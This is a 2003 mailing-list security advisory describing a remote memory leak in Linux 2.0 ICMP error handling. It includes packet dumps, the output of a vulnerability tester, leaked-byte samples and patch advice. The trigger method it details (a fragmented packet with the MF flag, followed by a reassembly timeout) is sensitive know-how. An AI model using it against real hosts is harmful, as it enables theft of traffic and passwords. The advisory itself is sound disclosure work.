lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0306090851320.19133-100000@deneb.intranet.cartel-securite.net>
Date: Mon, 9 Jun 2003 08:56:55 +0200 (CEST)
From: Philippe Biondi <biondi@...tel-securite.fr>
To: vuln-dev@...urityfocus.com, <full-disclosure@...ts.netsys.com>,
   <bugtraq@...urityfocus.com>
Subject: Linux 2.0 remote info leak from too big icmp citation


----------------------------------------------------------------------
               Cartel Sécurité --- Security Advisory

Advisory Number: CARTSA-20030314
Subject:         Linux 2.0 remote info leak from too big icmp citation
Author:		 Philippe Biondi <biondi@...tel-securite.fr>
Discovered:      March 14, 2003
Published:       June 9, 2003
CERT reference:  VU#471084 (http://www.kb.cert.org/vuls/id/471084)
----------------------------------------------------------------------

You can use this URL to link this document :
http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt


Problem description
===================

There is a bug in the way linux 2.0 kernel IP stack computes the size of an
ICMP citation for almost every ICMP errors. This leads to too much data being
sent on the network, coming from anywhere in the memory.

This is a very important leak. Experiments show that even passwords can
be stolen. Moreover, you can do this from anywere on the internet, as soon
as you can send IP packets to the vulnerable host (except special firewalling).

The typical case is when you use a linux 2.0 box (or, more probably,
any appliance that uses it) as a masquerading gateway for internet and
DMZ. In this configuration, the gateway can be used to leak potentially
all your traffic from your LAN, even your POP passwords for
the mail server in the DMZ.


Vulnerable products
===================

Any 2.0 linux kernel before 2.0.39 (2.0.39 included)
Watchguard Firebox II

Any appliance (firewall, proxy, etc.) that uses linux 2.0 <= 2.0.39


A tester can be found here (no guarantee though) :
http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py

Vulnerable:
# ./icmpleaktest.py  192.168.11.2
Packet sent. Answer should take 31s. Interrupt with C-c
Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'

Not vulnerable:
# ./icmpleaktest.py  172.16.1.40
Packet sent. Answer should take 31s. Interrupt with C-c
Got ''


Vendor status
=============

Linux 2.0.40 should be out soon.
Watchguard said updated releases will follow.

These vendors said they are not vulnerable :
* Netscreen
* Symantec
* Novell
* Clavister
* Ingrian
* StoneSoft
* Sun


Solutions
=========

* patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch
  (No guarantee)
* exchange your old appliance by a brand new linux 2.4/netfilter


Workarounds
===========

No good workarrounds. But you can at least carefully try these :
* truncate ICMP errors at the RFC limit,
* filter out icmp errors


Example
=======

We can send an IP packet with the MF flag :

15:41:05  192.168.0.12.80 > 192.168.0.10.80:  udp 4 (frag 52007:12@0+)
0x0000   4500 0020 cb27 2000 4011 0e3f c0a8 000c        E....'..@.......
0x0010   c0a8 000a 0050 0050 000c cd1e 5858 5858        .....P.P....XXXX

we wait 30s for the reassembly to timeout :

15:41:35  192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
0x0000   45c0 0050 dcca 0000 4001 1bbc c0a8 000a        E..P....@.......
0x0010   c0a8 000c 0b01 aa24 0000 0000 4500 0020        .......$....E...
0x0020   cb27 2000 4011 0e3f c0a8 000c c0a8 000a        .'..@...........
0x0030   0050 0050 000c cd1e 5858 5858                  .P.P....XXXX
                                       0050 0050                    .P.P
0x0040   000c cd1e 5858 5858 207b 2d68 0000 0000        ....XXXX.{-h....


Bytes at offsets 0x3c to 0x4f are bonus.
It works with every ICMP errors except the port unreachable error.
It is possible to increase the size of data leaked by adding IP options.


Examples of bonus bytes :

98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00   .....X..1234..U.
98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00   .........X......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03   X............X..
69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46   information.MINF
00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03   ..........U.....
00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00   .P.P....XXXX....
2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72   .0.%u.in-addr.ar
90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F   C_MONETARY.LC_CO
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00   ................
00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00   .P.P....XXXX....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00   ....._..........
73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E   sinl..gnu.warnin
70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40   p..@`..@...@...@
68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00   h...AF..g...AL..
FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00   ............J...
61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F   age-return.SI.SO
61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F   ash.zero.one.two
0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00   ................
01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00   ....-...........
4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00   L.......M.......
01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00   ....l.......m...
4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47   LC_ALL.LC_MESSAG


----------------------------------------------------------------------
Copyright (c) Cartel Sécurité
This document is copyrighted. It can't be edited nor republished
without explicit consent of Cartel Sécurité.
For more informations, feel free to contact us.
http://www.cartel-securite.fr/
----------------------------------------------------------------------

-- 
Philippe Biondi <biondi@ cartel-securite.fr> Cartel Sécurité
Security Consultant/R&D                      http://www.cartel-securite.fr
Phone: +33 1 44 06 97 94                     Fax: +33 1 44 06 97 99
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ